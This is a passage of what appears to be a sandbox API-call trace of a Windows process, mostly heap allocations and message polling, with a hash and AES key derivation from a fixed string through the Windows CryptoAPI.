lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0131.515] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0131.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0131.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0131.516] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0131.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0131.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43cadf0 [0131.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cadf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0131.519] CryptHashData (hHash=0x41ac700, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0131.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0131.521] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0131.521] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.521] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0131.521] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0131.522] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0131.522] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0131.522] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0131.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0131.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0131.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43caf40 [0131.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caf40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0131.525] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac180) returned 1 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0131.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0131.526] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.526] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.526] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.526] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.526] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.526] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0131.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, 